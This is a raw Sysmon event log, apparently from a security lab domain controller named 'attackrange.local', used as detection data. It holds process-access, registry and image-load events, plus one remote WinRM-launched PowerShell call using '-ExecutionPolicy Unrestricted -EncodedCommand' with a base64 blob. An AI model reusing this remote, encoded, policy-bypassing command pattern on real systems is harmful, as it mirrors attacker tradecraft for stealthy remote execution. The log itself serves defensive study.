13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7C00-00000000A301}41524244C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.893{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.876{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 13241300x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 13241300x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{ad56e231-9b3d-476f-8f2e-efb58e5dfb43}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{ad56e231-9b3d-476f-8f2e-efb58e5dfb43}\LastProbeTimeDWORD (0x60058e6e) 13241300x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\DateLastConnectedBinary Data 13241300x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\NameTypeDWORD (0x00000006) 13241300x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\DateCreatedBinary Data 13241300x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\CategoryDWORD (0x00000002) 13241300x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\ManagedDWORD (0x00000001) 13241300x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\Descriptionattackrange.local 13241300x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\ProfileNameattackrange.local 734700x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:59.018{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 734700x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.782{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.782{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.767{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.751{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 